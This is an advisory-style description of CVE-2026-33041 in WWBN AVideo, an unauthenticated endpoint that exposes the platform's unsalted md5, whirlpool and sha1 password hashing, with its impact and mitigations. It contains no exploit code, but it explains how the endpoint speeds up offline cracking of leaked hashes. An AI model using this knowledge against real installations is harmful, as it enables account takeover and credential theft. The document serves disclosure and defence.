CVE-2026-33041 is a vulnerability in the open-source WWBN AVideo platform, specifically in versions 25.0 and earlier. The issue arises from the endpoint /objects/encryptPass.json.php, which is accessible without authentication and exposes the platform's password hashing algorithm. This endpoint allows any unauthenticated user to submit arbitrary plaintext passwords and receive their hashed outputs as used internally by the application. Because the hashing method is disclosed directly, attackers do not need to reverse-engineer or guess the algorithm. The hashing scheme itself is a weak combination of md5, whirlpool, and sha1 applied sequentially, and crucially, it does not use salting by default, making it vulnerable to precomputed hash attacks. If an attacker has obtained password hashes from the database—via SQL injection, backup file exposure, or other means—they can leverage this endpoint to generate hash equivalents of guessed passwords and compare them directly, dramatically speeding up offline password cracking. This effectively reduces the effort and time required to recover user passwords. The vulnerability impacts confidentiality by exposing sensitive password hashing details and facilitating credential compromise. The flaw does not require any privileges or user interaction, increasing its risk profile. The issue was addressed and fixed in version 26.0 of WWBN AVideo, where presumably the endpoint was removed or access restricted and/or the hashing algorithm improved. No known exploits have been reported in the wild as of the publication date.

The primary impact of this vulnerability is on the confidentiality of user credentials. Attackers who gain access to password hashes through other vulnerabilities or data leaks can use the exposed hashing algorithm endpoint to perform rapid offline cracking, significantly increasing the likelihood of recovering plaintext passwords. Compromised credentials can lead to unauthorized account access, data breaches, and potential lateral movement within affected organizations. Since WWBN AVideo is a video platform, attackers could gain control over user accounts, potentially leading to unauthorized content access, content manipulation, or privacy violations. The vulnerability does not affect system integrity or availability directly but can facilitate further attacks that do. Organizations relying on affected versions face increased risk of credential compromise, especially if password hashes have been leaked or if other vulnerabilities exist. The ease of exploitation (no authentication or user interaction required) and the widespread use of weak hashing exacerbate the threat. This can undermine user trust and lead to regulatory or compliance issues if user data is exposed.

The primary mitigation is to upgrade WWBN AVideo installations to version 26.0 or later, where this vulnerability is fixed. If immediate upgrade is not possible, organizations should restrict access to the /objects/encryptPass.json.php endpoint via network controls or web application firewalls to prevent unauthenticated access. Additionally, consider implementing stronger password hashing algorithms with salting, such as bcrypt, Argon2, or PBKDF2, to replace the weak md5+whirlpool+sha1 chain. Review and secure database backups and other sources of password hashes to prevent leakage. Conduct thorough audits for other vulnerabilities like SQL injection that could expose password hashes. Enforce strong password policies and consider multi-factor authentication to reduce the impact of compromised credentials. Monitor logs for unusual access patterns to the hashing endpoint or other suspicious activities. Finally, educate users about the importance of unique, strong passwords to mitigate risks from offline cracking.